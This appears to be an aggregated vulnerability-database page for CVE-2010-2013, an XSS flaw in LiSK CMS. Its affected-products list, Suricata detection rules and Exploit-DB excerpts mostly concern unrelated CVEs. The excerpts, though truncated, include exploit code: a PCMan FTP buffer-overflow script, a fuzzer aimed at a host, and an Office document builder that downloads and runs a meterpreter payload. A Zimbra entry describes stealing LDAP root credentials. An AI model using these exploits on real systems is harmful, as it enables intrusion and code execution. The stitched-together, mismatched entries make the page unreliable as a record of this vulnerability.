CVE-2010-2013
published 2010-05-24
Priority: P414, medium, 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS: 1.06% (60.4th percentile)
Cross-site scripting (XSS) vulnerability in cp/edit_email.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| createch-group | lisk_cms | — | — |
| msrc | microsoft_365_apps_for_enterprise_for_32-bit_systems | — | — |
| msrc | microsoft_365_apps_for_enterprise_for_64-bit_systems | — | — |
| msrc | microsoft_excel_2010_service_pack_2 | — | — |
| msrc | microsoft_excel_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_excel_2013_service_pack_1 | — | — |
| msrc | microsoft_excel_2016 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | microsoft_office_2019_for_32-bit_editions | — | — |
| msrc | microsoft_office_2019_for_64-bit_editions | — | — |
CVSS provenance
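| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
| vendor_msrc | — | 7.8 | HIGH | — |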
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29
CVE-2010-3333 ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Suricata
ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
suricata·2013-01-15
CVE-2010-0188 ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
Rule: alert http1 $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request"; flow:established,to_server; urilen:8; http.uri; pcre:"/\x2F[0-9]{3}\.pdf$/"; http.request_line; content:".pdf HTTP/1."; fast_pattern; reference:url,blogs.mcafee.com/mcafee-labs/red-kit-an-emerging-exploit-pack; reference:cve,2010-0188; classtype:exploit-kit; sid:2016210; rev:4; metadata:created_at 2013_01_15, cve CVE_2010_0188, performance_impact Moderate, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_07;)
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
exploitdb·2016-08-10·CVSS 7.8
CVE-2016-3313 [HIGH] Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
---
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
1) Introduction
Microsoft Word is a word processor developed by Microsoft. It was first re
Exploit-DB
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
exploitdb·2015-12-14
CVE-2015-6132 Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=556
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has an InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.
When a user op
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Zimbra 2009-2013 - Local File Inclusion
exploitdb·2013-12-06
CVE-2013-7091 Zimbra 2009-2013 - Local File Inclusion
---
# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials which allo
Exploit-DB
PCMan FTP Server 2.0 - Remote Buffer Overflow
exploitdb·2013-06-30
CVE-2013-4730 PCMan FTP Server 2.0 - Remote Buffer Overflow
---
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1
Exploit-DB
Pwstore - Denial of Service
exploitdb·2013-04-16
CVE-2013-5657 Pwstore - Denial of Service
---
source: https://www.securityfocus.com/bid/62112/info
pwStore is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the application, denying service to legitimate users.
pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
from sulley import *
import sys
import time
s_initialize("HTTP")
s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")
print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1"
Exploit-DB
Microsoft Office 2010 - Download Execute
exploitdb·2013-02-20
CVE-2010-3333 Microsoft Office 2010 - Download Execute
---
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in th
http://secunia.com/advisories/39912
http://www.htbridge.ch/advisory/xss_vulnerability_in_product.html
http://www.securityfocus.com/archive/1/511379/100/0/threaded
2010-05-24
Published